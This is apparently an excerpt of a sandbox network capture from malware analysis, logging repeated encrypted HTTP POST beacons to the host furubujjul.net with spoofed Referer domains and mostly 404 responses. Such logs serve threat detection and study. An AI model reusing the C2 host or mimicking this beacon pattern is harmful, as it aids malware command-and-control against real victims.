                                                                                                                                  Oct 17, 2022 22:06:30.254071951 CEST1069OUTData Raw: 48 9d 89 cd 3c 6e 22 52 2a 77 53 25 7c af 53 cd 5b 18 ef 1a fb 1c dd ac b5 6e a4 f2 07 f6 d3 96 fe ae 8a c2 72 32 e3 b5 a5 2c 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 b9 8a 14 62 cd d6 4f 96 ed e4 16 bf
                                                                                                                                  Data Ascii: H<n"R*wS%|S[nr2,jp_S61oJf=B!bO.&'?MMo
                                                                                                                                  Oct 17, 2022 22:06:30.360281944 CEST1070INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:30 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qv76Zyv3DXqgduqpOT%2Fap6kb0AyM2NyxeEgH7VsxPdEZTPxUekzEzzcATGgBWTP%2FisMnu7pADkRp3bs8HC6Aw2d9m3TDB3endIm4DUQGiJGlz2bmhrK6pYVP2hK6BL3llg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7b72c0e06d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:30.375211954 CEST1070OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ypsqcei.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 184
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:30.375282049 CEST1071OUTData Raw: 48 9d 89 cd 3c 6e 22 52 2a 77 53 25 7c af 53 cd 5b 18 ef 1a fb 1c dd ac b5 6e a4 f2 07 f6 d3 96 fe ae 8a c2 72 32 e3 b5 a5 2c 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 be 8a 14 62 cd d6 4f 96 e2 f1 09 d6
                                                                                                                                  Data Ascii: H<n"R*wS%|S[nr2,jp_S61oJf=B!bOlld-qnU$9eJT((kcq"M8,X '(1t,t
                                                                                                                                  Oct 17, 2022 22:06:30.475930929 CEST1071INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:30 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k5zlqtk%2F8xb1LLitUYEq85Pm83C0wQVr8uiIbjT6o%2BKE74AFyy3v5p9p7o5%2BVY9Gg0Kegac6YXfDb7n9q0lWHzholuQ%2FbC7cBYX4zn8%2BYv0Wq%2BUh%2FYvXasQsRzx0h2Hwpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7b7ed3706d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 32 38 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c cd 44 9f 05 85 a2 4e f2 7a a6 64 14 0e 63 bf 75 4a 61 94 5d 0d 0a
                                                                                                                                  Data Ascii: 28Uys/~(`:LDNzdcuJa]
                                                                                                                                  Oct 17, 2022 22:06:31.679177046 CEST1302OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://gayxc.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 340
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:31.679311991 CEST1303OUTData Raw: 48 9d 89 cd 3c 6e 22 52 2a 77 53 25 7c af 53 cd 5b 18 ef 1a fb 1c dd ac b5 6e a4 f2 07 f6 d3 96 fe ae 8a c2 72 32 e3 b5 a5 2c 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a3 19 be 8a 14 62 cc d6 4f 96 96 e5 4f f6
                                                                                                                                  Data Ascii: H<n"R*wS%|S[nr2,jp_S61oJf=B!bOO$:psEA*xZ^II7_3J5*MD,t<ps85;"iTeFs:j8Wb!nN;zTL>rt+
                                                                                                                                  Oct 17, 2022 22:06:31.817365885 CEST1304INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:31 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s1v%2Bgx4MDe2nngZ9vJhRTJWiek%2BpWKZYyxOm0WJRASi81rbou8GGd%2F%2FeG26tujefQqKwWTxHJaHKHDha6hV1wZ4kH%2FgrGuq4WbkiHZJnCWTbb8WYeo1y3RI7b3EakRPZFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7c00a9a06d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:32.346658945 CEST1304OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://jnwjh.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 274
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:32.346724987 CEST1305OUTData Raw: 48 9d 89 cd 3c 6e 22 52 2a 77 53 25 7c af 53 cd 5b 18 ef 1a fb 1c dd ac b5 6e a4 f2 07 f6 d3 96 fe ae 8a c2 72 32 e3 b5 a5 2c 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 bf 8a 14 62 cd d6 4f 96 93 b9 21 e9
                                                                                                                                  Data Ascii: H<n"R*wS%|S[nr2,jp_S61oJf=B!bO!pa_C%b./YYe~VKNX5H*?V*VmpKkS:1R&SwWX< GfO-GM"u2b<t]*
                                                                                                                                  Oct 17, 2022 22:06:32.456585884 CEST1306INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:32 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MH4T%2FMqff3N4OrHnnRMlaneafNnafTKCK3Vq2FjF2qz8fObhvZWeTjJTFrlpRqN31PS4KGh4yZIFW66%2FeexijRGYNTk8quehV%2F2jp1MVRy%2Bp4C6R2YVFzPcklcB5Kf12EQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7c439d906d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:32.805388927 CEST1306OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://kqnukffkf.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 162
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:32.805485964 CEST1306OUTData Raw: 48 9d 89 cd 3c 6e 22 52 2a 77 53 25 7c af 53 cd 5b 18 ef 1a fb 1c dd ac b5 6e a4 f2 07 f6 d3 96 fe ae 8a c2 72 32 e3 b5 a5 2c 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 bc 8a 14 62 cd d6 4f 96 97 b8 3a cc
                                                                                                                                  Data Ascii: H<n"R*wS%|S[nr2,jp_S61oJf=B!bO:p|qdkJyrFOr2*k:=JetJ=,~mRF
                                                                                                                                  Oct 17, 2022 22:06:32.912211895 CEST1307INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:32 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B34UVpqEQHKdsJgz9n2w%2FdDIj9mLcQhOn%2FWU9b8g3v8kE4PrQyGsCvL2kSD0gcLFVt2yH%2B9fzTkKoVPpyQ%2BqEhnggeuiw4PcSbsSJ3whOwsqss%2BejPa%2FDoThyuMxZ44Jsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7c71f1f06d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 33 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 85 14 dd 51 d5 ff 13 b1 67 f2 25 48 16 22 e0 6a 0b 65 88 17 0a 03 6b de a0 81 8f d0 30 d1 76 64 5d 28 e2 0d 0a
                                                                                                                                  Data Ascii: 37Uys/~(u:RQg%H"jek0vd](
                                                                                                                                  Oct 17, 2022 22:06:37.042898893 CEST1537OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://njomtuqes.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 202
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:37.151626110 CEST1538INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:37 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=65wTixgQCVrdomjCkVKJ7TSMtzbH4CsUGEvFxgg1qB7oZlfR9TRjZFOJc2vP9np%2FMEj35fyeNLOtl3%2BDJr4r0wpKzaovSk9ABB3TZ56N3sxjSIhQbHYJZ5pVYhljLcgM4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7e1997606d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:37.188725948 CEST1538OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://bcubynupij.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 143
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:37.311263084 CEST1540INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:37 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yiHLB0muGZOWOS1UV%2FZ6%2FxBSP4kFNUgzgmMPY39sAPx9z06Lh5JuDfHt8%2BH1sbkZVBeIKcBujy5Fs%2FWgtJdkr9xK0Igud8Anyw%2BoJ0pr9fs1Kq0VUydzwS7JmIEv55ID4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7e27ad706d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 33 38 33 30 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 c5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 00 59 3e b0 19 c6 28 d9 b5 96 d3 15 69 05 0f d6 f2 97 ac f7 97 3b e2 df 61 23 30 54 2d f5 09 16 69 6c 32 60 e0 dd 6d 61 12 2a 85 19 5e f7 6b db 89 b2 07 5a b1 a4 07 0d ab 17 c4 f8 48 7c e1 66 90 cc f8 83 53 34 77 70 36 f8 37 33 62 97 23 f5 ed 05 70 b1 17 22 58 4a 63 0a 62 3e 59 20 08 5a ac 6a 09 5b 56 3f cb 00 23 be 42 15 37 07 50 52 f1 ca 16 9e 1d f9 53 2b e5 d3 94 7b 7e 45 f7 ff 7e 2c 55 db c4 1d 13 13 bf 1e e3 92 24 08 0f c5 03 b1 cb a1 61 7c de f5 6c b9 19 17 7e 5f af 9a a0 44 c9 a0 c1 b9 dd 7a 0d d0 57 19 e0 28 95 a9 38 14 f1 96 bc 25 51 e0 9a d4 2e 7c 88 38 c8 48 6b a1 d0 4a 9a 13 fd ec 9e aa 7b ac 97 2f bd 61 0d c0 5d bf 46 34 fd f8 6e 9f 32 6c 01 7c 0a 8d c7 0d fc 0e 7c a0 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 d7 29 2a b9 6e ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 9f 08 3c 27 94 69 b7 9f 33 c9 cc 46 d9 48 15 ac af fb d9 55 21 ad ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b aa 93 58 1e 85 8a 64 b1 ad df 13 51 8c 60 17 4b 81 9b de 8e 82 05 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 4f c3 cb 49 1c 4c 86 2f 7f 54 ab 1e e6 9e 07 ee c3 ce 55 a3 4c 37 84 1f d4 a8 69 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 e6 7d 10 5f 3e cb aa c2 fa 07 99 8a 15 af 7f 74 79 a0 75 43 cc f5 8b 8b e1 7c 79 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 5f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4
                                                                                                                                  Data Ascii: 3830`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*Y>(i;a#0T-il2`ma*^kZH|fS4wp673b#p"XJcb>Y Zj[V?#B7PRS+{~E~,U$a|l~_DzW(8%Q.|8HkJ{/a]F4n2l||~qhJO;yLuV)*n#u1yr+Lc<'i3FHU!hU@Wd{9f(B@wXdQ`K^NTUOIL/TUL7i),^[}_>tyuC|y+z(F_zk7 RH:M?~Mpvn%.5_)CCUb:@
                                                                                                                                  Oct 17, 2022 22:06:38.070897102 CEST1773OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://xeebbali.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 302
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:38.175702095 CEST1774INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:38 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OJJMFUDHfK88ejDb3ssSgFlIiEfC3o%2FsibgdQSJX%2Bj5YP9NLc75w8mjBAVXgyOiGaz5xhN1OBkqQMjxU1YMvnY%2BlcycxsRry5NM3%2BM1b%2B3nAdax6pmmNprEk1hp7Mmd%2F5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7e7fb9506d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:38.261997938 CEST1775OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ygjlvm.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 367
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:38.378248930 CEST1777INHTTP/1.1 404 Not Found
